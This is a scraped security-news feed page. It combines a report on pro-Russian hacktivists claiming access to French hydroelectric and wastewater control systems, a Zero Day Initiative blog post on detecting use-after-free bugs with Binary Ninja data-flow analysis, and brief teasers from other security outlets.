to industrial control panels, VNCs, and HMIs to disrupt industrial operations and maximize the impact of their attacks.” Hacktivists Hit French Critical Infrastructure Cyble has detailed numerous attacks against French ICS and SCADA (Supervisory Control and Data Acquisition) systems. Among other attacks, the pro-Russian hacktivist group Z-Pentest claims to have gained unauthorized access to a hydroelectric power plant’s SCADA system. The group shared screenshots of turbine control settings, power output data, water flow rates, and generator synchronization parameters. Z-pentest screenshot of alleged energy controls access Sector16, in collaboration with the Russian group OverFlame, claimed unauthorized access to the control systems of another hydroelectric facility in the southern region of France. Images of the control interface suggest a system “designed for managing critical operations such as water level regulation, pressure control, and turbidity monitoring,” Cyble said, along with advanced tools for monitoring and controlling parameters tied to the facility''s hydroelectric operations. Golden Falcon Team claimed responsibility for unauthorized access to an application that monitors municipal wastewater sanitation works in France. The group released screenshots of interface control metrics such as pH levels, temperature, conductivity, and water distribution processes, which are essential for managing wastewater treatment and public sanitation operations. Conclusion The Cyble report underscores the importance of strong DDoS and critical infrastructure cybersecurity controls. A comprehensive, risk-based vulnerability management program, strong access controls based on Zero Trust principles, network segmentation – particularly between operational technology (OT) and IT networks – and removing or protecting web-facing access are some of the more important controls for all organizations to adopt. Cyble’s comprehensive attack surface management solutions can help organizations protect vulnerable assets, whether at the network’s edge or in the cloud. The post Hacktivists Increasingly Target France for Its Diplomatic Efforts appeared first on Cyble.

by CYBLE

The encrypted messaging app Signal is getting some unexpected attention this week. High-ranking officials in the Trump administration, including Vice President J. D. Vance and Secretary of Defense Peter Hegseth, communicated the plans for an attack on the Yemeni Houthis via a potentially unauthorized group chat on Signal. However, Atlantic editor-in-chief Jeffrey Goldberg was mistakenly […]

by TechCrunch

Lynx ransomware, emerging in 2024, targets finance, architecture, and manufacturing sectors with phishing and double extortion. Read on for Darktrace''s findings.

by Darktrace

Hackers have long used Word and Excel documents as delivery vehicles for malware, and in 2025, these tricks are far from outdated. From phishing schemes to zero-click exploits, malicious Office files are still one of the easiest ways into a victim’s system. Here are the top three Microsoft Office-based exploits still making the rounds this year and what you need to know to avoid them. 1.

by The Hacker News

Your Venmo activity is public by default. Here''s why that''s a problem and how to fix it.

by ZDNET Security

Use-after-free is a memory corruption condition where a program references memory after it has been released back to the allocator. Statically detecting these bugs can be challenging. In the past, several approaches have addressed this problem, such as GUEB by Josselin Feist and Sean Heelan''s work on Finding use-after-free bugs with static analysis. This blog post explores the usage of Binary Ninja’s Medium Level Intermediate Language (MLIL) to establish a data flow graph by tracing interactions between a specific memory allocation and other memory regions. Building on the data flow graph, it is further utilized in context-insensitive reachability analysis across functions to identify potential Use-After-Free (UAF) vulnerabilities in binaries. Like any other static code analysis approach, this one also has classification errors. While acknowledging the classification errors inherent to static code analysis, we highlight primitives that may also be adaptable for modeling other types of vulnerabilities.For readers interested in Binary Ninja APIs, refer to our earlier blog post, which comprehensively explains using Binary Ninja Intermediate Languages (ILs) and Static Single Assignment (SSA) form.Building a Data Flow Graph of Memory AllocationIn this context, data refers to the pointer associated with a specific memory allocation that is the subject of tracking and analysis. The data flow information is visualized as a graph, where:•    Nodes represent different memory regions.•    Edges represent pointer store operations that establish relationships or interactions between these regions.In this implementation, four distinct types of nodes are utilized to construct the data flow graph, each serving a specific purpose:Tracked Allocation Node (Red): Represents a memory allocation of interest, and acts as the focal point for tracking interactions across the graph.Function Stack Frame Nodes (Green): Represent the stack frames of individual functions visited during inter-procedural analysis.Dynamic Memory Nodes (Blue): Represent Static Single Assignment (SSA) variables that cannot be tied to a specific source. These could include dynamically allocated memory or arguments passed to functions for which we lack insights within the scope of the function.Global Memory Nodes (Black): Global variables across functions are not comprehensively tracked. However, these nodes help analyze interactions within a single function.The edges in the graph represent pointer store operations, establishing connections between memory allocations. The source node corresponds to the memory being written to and the destination node represents the pointer value being stored. The edge attributes capture the offsets from allocation base addresses. The “write” attribute indicates the offset from the base of an allocation (source node) where the pointer is written to, and the “points” attribute indicates the offset within an allocation (destination node) that the written pointer value points to. New edges are created for every unique value of “write” or “points” attribute. Write operations to stack memory are represented using absolute values from the base of the stack as represented by Binary Ninja and hence will have negative offsets for most of the architectures. When “write” or “points” attribute is 0, it means base of an allocation. Edges are additionally created during unresolved memory load operations, assuming that the relevant memory store occurred outside the function scope. This graphical representation helps understand how memory regions interact. Below is a section of a sample graph generated during analysis of OpenSLP, providing better clarity on the details described: Figure 1 - Section of Data Graph Mapping Relationships Between SSA Variables, Graph Nodes, and Edges Now that we have an understanding of our graph structure, let''s explore how SSA variables are mapped to the nodes in the data flow graph. In our automated analysis, the first SSA variable to be tracked is the one assigned the return value of an allocator call, such as malloc() or calloc(). Furthermore, a Binary Ninja GUI interface could be developed to enable users to mark arbitrary variables for tracking and include them in further analysis. Once we identify the SSA variable of interest, we can leverage the definition-use chain to traverse all its uses within the function. Binary Ninja provides the get_ssa_var_definition() and get_ssa_var_uses() APIs to retrieve a variable''s definition site and its uses, respectively. Consider the below C code and Binary Ninja’s MLIL SSA representation of the same: Here, the return value of call to malloc() is written to SSA variable rax#1 and the further usage of rax#1 in the function can be fetched using get_ssa_var_uses() API: A variable points to a node, and in this context, rax#1 points to the Tracked Allocation Node (Red). When rax#1 is assigned to var_10#1, this information is propagated to var_10#1 and subsequently to any further assignments. When a variable assignment involves pointer arithmetic, a piece of offset information is stored in addition to the node. In this case, the offset is 0 because all the variables point to the base of the Tracked Allocation Node. The ptr variable in the function stack is represented by the SSA variable var_10#1, which stores the pointer to the allocated memory. The offset for this variable can be extracted and represented as an edge in the graph. In essence, two data structures are constructed: a dictionary that maps SSA variables to nodes and a graph that connects various memory regions, represented as nodes. Since SSA variables are associated with their specific functions, they can be uniquely identified across functions during inter-procedural analysis. Figure 2 - Connection Between Tracked Allocation Node (Red) and Stack Frame Node (Green) The following code snippet demonstrates the creation of a Tracked Allocation Node (Red node) and the initialization of the SSA variable dictionary, which contains information about the SSA variable and the node it references: Let''s examine another example of code and its MLIL translation to understand the process of creating a Dynamic Memory Node (Blue). Within the function scope, there is no information about the location recptr points to. When recptr->link is initialized with the return value of a call to malloc(), a Dynamic Memory Node is created with an edge to the Tracked Allocation Node. This corresponds to the MLIL instruction 0000118a [rax_1#2 + 8].q = rdx#1 @ mem#1 -> mem#2 (MLIL_STORE_SSA), where the edge attribute contains the offset information. The variable rax_1#2 can be tracked back to arg1#0 using the SSA use-def chain. Figure 3 - Connection Between Tracked Allocation Node (Red) and Dynamic Memory Node (Blue) Essentially, whenever memory store operations such as MLIL_SET_VAR_SSA, MLIL_STORE_SSA, or MLIL_STORE_STRUCT_SSA are encountered, edges are created in the graph. In Binary Ninja’s MLIL SSA form, MLIL_SET_VAR_SSA is not strictly a memory store operation since stack writes are translated to SSA variables. However, the variables still retain offset information, which can be used to construct the data flow graph. Translating Memory Loads to Graph Edges While memory store operations are translated into graph edges, as previously discussed, load operations from memory outside the function scope are also represented as graph edges. Consider the following example: Within the function scope, there is no specific information about recptr. However, when the pointer returned by malloc() is written to recptr_new->link, this memory is traced back to the argument passed, i.e., recptr (arg1#0), using the SSA use-def chain. The memory load operation recptr->link is translated to 0000117d rax_1#2 = [rax#1 + 8].q @ mem#0 in the MLIL SSA representation. This load operation is represented as an edge between arg1#0 and rax_1#2. The underlying assumption here is that if the memory is being loaded, it must have been initialized beforehand. Memory store, assignment, and load operations serve as the fundamental building blocks of the data flow graph. Figure 4. Data Flow Graph Developed from Memory Store and Load Operations Traversing the Data Flow Graph to Propagate Information Now that we understand how variables are initialized as mappings to nodes in the graph and how memory accesses are translated to edges, the next question is: how is this information propagated when traversing instructions in the SSA def-use chain? The answer lies in the SSA variable dictionary and the graph that we initialized previously.         -- A direct variable assignment is straightforward. The value of the source variable is assigned to the destination variable. Consider an expression like rax#0 = rbx#0. Here rax#0 is assigned with the value of rbx#0 from the SSA variable dictionary.         -- For a variable assignment where pointer arithmetic is involved, offset information is stored in addition to the node. Consider an expression like rax#0 = rbx#0 + 0x10. Here rax#0 is assigned with the node pointed to by source variable rbx#0 and holds the offset value to the node, which is 0x10.         -- For a variable assignment where pointer arithmetic is involved, the node information from the source variable is directly assigned to the destination variable, just as in the case of direct assignment. However, in this situation, the offset information is updated to reflect the pointer arithmetic operation. Consider an expression like rax#0 = rbx#0 + 0x10. Here rax#0 is assigned with the node pointed to by source variable rbx#0 but the offset value is set to 16.         -- A variable assignment where data is loaded from memory like rax_1#2 = [rax#1 + 8].q, the edges of the graph are visited to fetch the target node pointed to by the source variable. To detail further, the node and the offset associated with rax#1 (base variable) is fetched from the SSA variable dictionary. Then the final offset is computed as the sum of “offset” fetched from SSA variable dictionary and the offset from the load instruction. Once the node and the computed offset are available, we find the edge which has the “write” offset equal to that of the computed offset by walking through all the edges of the node. The destination node and “points” offset associated with this edge are assigned to rax_1#2. Essentially, we resolve a memory load operation to node and offset values, which can be used to update the SSA variable dictionary. Below is the code snippet to demonstrate this: Callees are visited after all the instructions in a def-use chain of the calling function have been processed. A callee is considered for further analysis only if any arguments passed to the function have mappings in the SSA variable dictionary. Recursion is managed by monitoring the call stack for repeated calls to the same function and terminating the analysis after a predefined number of iterations. In cases where stack memory is passed as an argument, the callee is also analyzed if the stack offset passed is less than the write offset value of any edges associated with the respective Function Stack Frame Nodes (Green). This consideration ensures that even if a structure element is initialized within a function and the base of the structure is passed to the callee (with the stack growing downwards and using negative offsets), the analysis accounts for it appropriately. Once the instructions in the SSA def-use chains of both the caller and callees have been traversed, the data flow graph generation is considered complete, with all variable information fully populated for further analysis. Logging Instructions Linked to Tracked Allocation After completing the SSA variable mapping and generating the data flow graph, the instructions are revisited. All memory loads, memory stores, or call instructions dependent on the Tracked Allocation Node are recorded, along with the statically generated call stack. These are considered as ""Use"". Additionally, call instructions involving deallocator functions are logged and considered as ""Free"". Below is a sample code snippet for handling MLIL_STORE_SSA instruction: Inter-Procedural Analysis for Use-After-Free Detection via Call Stack Once the logging is done, detecting potential use-after-free bugs involves analyzing all basic blocks categorized as ""Free"" and verifying if any paths lead to basic blocks categorized as ""Use"". If such a path exists, it is flagged as a potential use-after-free condition. Since double-free bugs are related to use-after-free, the analysis also examines whether a path exists from one ""Free"" block to another ""Free"" block. If such a path is detected, it is flagged and logged as a potential double-free condition. In forward data flow analysis, there is at least one common function in the call stack leading to ""Free"" and the call stack leading to ""Use."" For example, consider a scenario where function A allocates memory, passes it to function B for use, which propagates it further to function C, where it gets freed. The instructions using the allocation in B have a call stack of A leading to B, while the call stack for function C includes A leading to B and B leading to C. The last common function in these two call stacks is B. The analysis conducted here is not context-sensitive and focuses solely on reachability. Therefore, instead of identifying a direct path between the basic block in C that frees the memory and the instructions in B that use the memory, the analysis checks for a path within the last common function, i.e., between the basic block in B that calls function C and the basic blocks in B that use the memory. This approach allows for inter-procedural analysis while limiting the pathfinding to the last common function, improving efficiency and scope control. Otherwise, one may have to inline multiple functions into a single graph to perform reachability analysis. Additionally, loops require special attention to minimize false positives. In loops, backward edges can connect basic blocks following a deallocation to those preceding an allocation. Therefore, instructions executed after an allocation but before a deallocation can still appear reachable in the graph, potentially being misidentified as use-after-free. To mitigate this, all incoming edges to the basic block that invokes the allocator function are removed in the control flow graph. This effectively disconnects statements that would otherwise appear reachable within the loop, reducing the false positive results. Automated Detection of Allocator and Deallocator Calls While it is ideal to use allocator and deallocator wrappers specific to the program as input for this analysis, manually identifying them can be challenging. An easier starting point is to input standard functions like malloc(), realloc(), and free(), examine the outcomes, and progressively refine the analysis based on the results. By cross-referencing allocator functions like malloc() and leveraging def-use chains, we can determine if the pointer returned by an allocator function is subsequently returned by the caller. If so, the caller is likely a wrapper around the allocator. For finding deallocator functions, the approach is similar to the one mentioned as “Function aliases” by Sean Heelan. Binary Ninja’s dataflow analysis can be used to verify whether any of the caller''s function parameters are directly passed to a deallocator such as free(). This can be identified by checking if the parameter’s value type is RegisterValueType.EntryValue. If this condition is met, it indicates a potential wrapper around the deallocator function. Using a JSON file with minimal allocator details, numerous functions involved in allocating and deallocating data structures were identified in OpenSLP. These discovered functions can be incorporated into the JSON file for further analysis. Currently, the ""arg"" key holds no significance in the implementation. Since we perform forward data flow analysis, which involves visiting the functions that invoke the allocator call as well as the callees of those functions, identifying these wrappers allows us to shift the starting point of our analysis. Simply put, instead of beginning our analysis inside SLPMessageAlloc(), where forward data flow analysis has limited scope because it calls calloc() without further interactions, we can focus on analyzing all the functions that call SLPMessageAlloc(). This approach broadens the scope and provides better insights into the data flow. Analyzing Real-World Vulnerabilities from the Past To understand how the tool works, let''s test it on some known vulnerable programs. Since GUEB already provides a list of identified vulnerabilities, I chose to use them as examples here. CVE-2015-5221: JasPer JPEG-2000 There is a use-after-free/double-free vulnerability in mif_process_cmpt() as seen in RedHat Bugzilla. By tracking the allocation and deallocation APIs, jas_tvparser_create() and jas_tvparser_destroy() respectively, the following results are observed: In this case, mif_process_cmpt() is inlined into mif_hdr_get(), and the results are displayed accordingly. CVE-2016-3177: Giflib Here is a double-free vulnerability in gifcolor - #83 Use-after-free / Double-Free in gifcolor In this case, the allocation and deallocation APIs used were EGifOpenFileHandle() and EGifCloseFile(), respectively, and the results are as follows: GNOME-Nettool This use-after-free vulnerability in get_nic_information() - Bug 753184. For this analysis, g_malloc0() and free() pair is tracked: Figure 5. UAF in get_nic_information CVE-2015-5177: OpenSLP This double-free issue in SLPDProcessMessage() #1251064 demonstrates a different scenario compared to the previous bugs. The earlier cases involved allocation, free, and use within the same function. However, in this double-free case, we observe the effectiveness of inter-analysis. This highlights how bugs spanning multiple functions can be detected, providing a broader scope of analysis for complex code paths. Pointers to memory allocated by SLPMessageAlloc() in SLPDProcessMessage() and SLPBufferAlloc() are passed to ProcessDAAdvert() when the message ID is set to SLP_FUNCT_DAADVERT. Within ProcessDAAdvert(), these pointers are further passed to SLPDKnownDAAdd(). If an error occurs in SLPDKnownDAAdd(), the buffers are freed using SLPMessageFree() and SLPBufferFree(), and a non-zero error code is returned to SLPDProcessMessage(). Subsequently, when SLPDProcessMessage() detects the non-zero error code, it attempts to free the same buffers again, resulting in a double-free condition. The upstream fix for this issue is found here - fix double free if SLPDKnownDAAdd() fails: Interestingly, two double-free issues are reported due to SLPMessageFree(), even though SLPDKnownDAAdd() frees these pointers only once in the code. This discrepancy occurs because the compiler, for optimization purposes, generates multiple basic blocks for the same target of a goto statement. This leads to multiple results being reported. Our implementation does not track the buffer allocated through SLPBufferAlloc() because the pointers are passed across functions via global memory, which is not currently within the scope of our tracking. Currently, the logging is very primitive. Every instruction classified as potential UAF condition is logged individually. Readability could be improved significantly by instead grouping the instructions by basic block or by function. ConclusionI hope you have enjoyed this look at using Binary Ninja to find use-after-free vulnerabilities through data flow analysis and graph reachability. The source code for the project can be found here - uafninja. If you find any vulnerabilities using these methods, consider submitting it to our bounty program. Until then, you can find me on Twitter at @RenoRobertr, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.Acknowledgments and References•     Various blog posts from Trail of Bits on Binary Ninja•     Josh Watson for various projects using Binary Ninja. The visitor class implementation is based on emilator•    Jordan for all the code snippets and the Binary Ninja slack community for answering various questions•    GUEB Static analyzer by Josselin Feist •    Sean Heelan''s work on Finding use-after-free bugs with static analysis.

by Zero Day Initiative Blog

A man didn''t just have his ID stolen, identity theft ruined his life and robbed him of a promising future.

by Malwarebytes Labs

DDoS attacks don''t take much technical expertise to launch these days. Defending against them is more complicated.

by ZDNET Security

University security operations centers that hire and train students are a boon to state and local governments while giving much-needed Tier 1 cybersecurity training to undergraduates.

by Dark Reading

Before diving into the Windows 11 2024 update, know that you may encounter some problems. Here''s the bug report now.

by ZDNET Security

Is moving from WhatApp to Signal a good idea? We look at the pros and cons, and which settings can make Signal even more private.

by Malwarebytes Labs

Go-Spoof brings an old tool to a new language. The Golang rewrite [of Portspoof] provides similar efficiency and all the same features of the previous tool but with easier setup and useability. The post Go-Spoof: A Tool for Cyber Deception appeared first on Black Hills Information Security, Inc..

by Black Hills Information Security

An ongoing campaign that infiltrates legitimate websites with malicious JavaScript injects to promote Chinese-language gambling platforms has ballooned to compromise approximately 150,000 sites to date. ""The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor''s browser,"" c/side security analyst Himanshu

by The Hacker News

A KnowBe4 Threat Lab PublicationAuthors: By James Dyer, Threat Intelligence Lead at KnowBe4 and Lucy Gee, Cybersecurity Threat Researcher at KnowBe4 On March 3, 2025, the KnowBe4 Threat Labs team observed a massive influx of phishing attacks originating from legitimate Microsoft domains.

by KnowBe4

Popularity of the generative AI platform makes it an obvious choice for cybercriminals abusing Google-sponsored search results, according to researchers.

by Dark Reading